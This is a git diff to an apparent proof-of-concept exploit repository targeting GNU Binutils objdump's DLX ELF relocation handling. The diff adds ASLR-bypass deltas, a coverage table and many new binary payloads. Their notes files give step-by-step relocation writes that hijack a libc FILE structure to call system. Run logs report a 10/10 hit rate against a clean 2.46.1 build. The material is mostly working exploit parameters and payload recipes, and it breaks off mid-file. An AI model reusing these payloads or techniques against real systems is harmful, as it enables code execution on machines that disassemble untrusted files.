diff --git a/objdump-dlx-calc-poc/README.md b/objdump-dlx-calc-poc/README.md index 4ba00cf..ed072d0 100644 --- a/objdump-dlx-calc-poc/README.md +++ b/objdump-dlx-calc-poc/README.md @@ -28,6 +28,7 @@ elf32-dlx - `dlx_chain_builder.py` - small builder used by the generator - `docs/aslr-bypass-analysis.md` - notes on why this is profile-dependent - `tools/search_pointer_transform.py` - Z3 sanity check for fixed pointer transforms +- `tools/aslr_delta_coverage.py` - lists the libc low-32 delta coverage used by the generator The payload files are named `.bin` because they are raw binary files, but the file format inside is ELF/DLX. @@ -43,22 +44,31 @@ relative offsets observed in the target process: ```text layout=wsl2404 off_io=-0x3690 off_sec=0xbb0 rbase=0x220 buf_delta=0x702fff00 or 0x6f300000 -system_delta=0x7042e500 or 0x7043e4ff +system_delta=0x7042e500, 0x6f42e600, 0x7043e4ff, 0x6f43e5ff, 0x7043e5ff, or 0x6f43e6ff layout=gnu2461 off_io=-0x3690 off_sec=0xbb8 rbase=0x190 sec_size_offset=0x40 buf_delta=0x702fff00 or 0x6f300000 -system_delta=0x7042e500 or 0x7043e4ff +system_delta=0x7042e500, 0x6f42e600, 0x7043e4ff, 0x6f43e5ff, 0x7043e5ff, or 0x6f43e6ff ``` -That is an ASLR-on relative-delta strategy, not a universal single-shot info-leak bypass. A miss can still happen, so the runner keeps the retry loop. +That is an ASLR-on relative-delta strategy, not a universal single-shot info-leak bypass. The six `system_delta` values cover every page-aligned low-32-bit libc base for the documented `_IO_2_1_stderr_` and `system` offsets. A miss can still happen if the heap/libio profile or libc build does not match, so the runner keeps the retry loop. More detail is in `docs/aslr-bypass-analysis.md`. -The `gnu2461` profile was validated with the existing runner: +The expanded `gnu2461` profile was validated with the existing runner against a +clean GNU Binutils 2.46.1 `dlx-elf` objdump build: ```text -HIT try=1 payload=.../payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.bin -CALC_HELPER_RAN 2026-06-25T11:14:27Z +HIT try=1 payload=payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7042e500.bin +CALC_HELPER_RAN 2026-06-25T11:19:07Z +``` + +A ten-run one-sweep stability pass against the same clean build also hit every +run: + +```text +hits=10/10 +CALC_HELPER_RAN 2026-06-25T11:19:31Z ``` So a plain crash like this does not always mean the PoC failed: diff --git a/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md b/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md index 15df6a9..2583658 100644 --- a/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md +++ b/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md @@ -24,7 +24,7 @@ off_io=-0x3690 off_sec=0xbb0 rbase=0x220 buf_delta=0x702fff00 or 0x6f300000 -system_delta=0x7042e500 or 0x7043e4ff +system_delta=0x7042e500, 0x6f42e600, 0x7043e4ff, 0x6f43e5ff, 0x7043e5ff, or 0x6f43e6ff ``` The `gnu2461` profile uses: @@ -35,7 +35,7 @@ off_sec=0xbb8 sec_size_offset=0x40 rbase=0x190 buf_delta=0x702fff00 or 0x6f300000 -system_delta=0x7042e500 or 0x7043e4ff +system_delta=0x7042e500, 0x6f42e600, 0x7043e4ff, 0x6f43e5ff, 0x7043e5ff, or 0x6f43e6ff ``` The 2.46.1 profile differs because the relocation cache array moved from @@ -43,6 +43,34 @@ The 2.46.1 profile differs because the relocation cache array moved from to `data+0xbb8`, and the `bfd_section.size` field used to widen generic relocation range checks is at section offset `0x40`. +## Fixed delta coverage + +The `FILE+0x68` field starts as a libc pointer to `_IO_2_1_stderr_`. The +payload uses a 32-bit big-endian relocation add to turn that low 32-bit value +into the low 32 bits of `system`. + +The previous payload set included two deltas. For the documented offsets: + +```text +_IO_2_1_stderr_ offset = 0x2044e0 +system offset = 0x58750 +``` + +there are six possible deltas over all page-aligned low-32-bit libc bases: + +```text +0x7042e500 pages=703488 coverage=0.670898 cumulative=0.670898 +0x6f42e600 pages=235520 coverage=0.224609 cumulative=0.895508 +0x7043e4ff pages=82620 coverage=0.078793 cumulative=0.974300 +0x6f43e5ff pages=26520 coverage=0.025291 cumulative=0.999592 +0x7043e5ff pages=324 coverage=0.000309 cumulative=0.999901 +0x6f43e6ff pages=104 coverage=0.000099 cumulative=1.000000 +``` + +`tools/aslr_delta_coverage.py` reproduces that table. This is better coverage +for the libc low-32 portion of the bypass, not a claim that the heap/libio +profile is universal. + ## Why argv two-stage is not enough A deterministic leak-then-exploit route would need this sequence in one diff --git a/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py b/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py index faf2348..ed2252b 100644 --- a/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py +++ b/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py @@ -28,7 +28,14 @@ SECTION_SIZE_HIGH = OFF_SEC + 0x3C BUF_TO_FILE_BE32_DELTAS = (0xEF210000, 0xF020FF00) WIDE_TO_FAKE_BE32_DELTAS = (0x4FFF0000,) -STDERR_TO_SYSTEM_BE32_DELTAS = (0x7042E500, 0x7043E4FF) +STDERR_TO_SYSTEM_BE32_DELTAS = ( + 0x7042E500, + 0x6F42E600, + 0x7043E4FF, + 0x6F43E5FF, + 0x7043E5FF, + 0x6F43E6FF, +) FILE_JUMPS_TO_WFILE_OVERFLOW_FINISH_BE16 = 0x0002 LAYOUTS = ( diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f42e600.bin new file mode 100644 index 0000000..2502321 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f42e600.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f42e600.notes new file mode 100644 index 0000000..9c30314 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f42e600.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x05 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e5ff.bin new file mode 100644 index 0000000..fe5f171 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e5ff.notes new file mode 100644 index 0000000..338ed11 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e5ff.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x05 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.bin new file mode 100644 index 0000000..088ecfa Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.notes new file mode 100644 index 0000000..1662f26 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x05 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.bin new file mode 100644 index 0000000..a4ae616 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.notes new file mode 100644 index 0000000..84b0976 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x05 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f42e600.bin new file mode 100644 index 0000000..1b682a9 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f42e600.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f42e600.notes new file mode 100644 index 0000000..ded9e2b --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f42e600.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.bin new file mode 100644 index 0000000..8f5ab73 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.notes new file mode 100644 index 0000000..056e0d2 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.bin new file mode 100644 index 0000000..7c5ed70 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.notes new file mode 100644 index 0000000..0677195 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e5ff.bin new file mode 100644 index 0000000..4c4baf7 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e5ff.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e5ff.notes new file mode 100644 index 0000000..9b25b47 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f42e600.bin new file mode 100644 index 0000000..2502321 Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f42e600.bin differ diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f42e600.notes new file mode 100644 index 0000000..bcd6b45 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f42e600.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x06 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 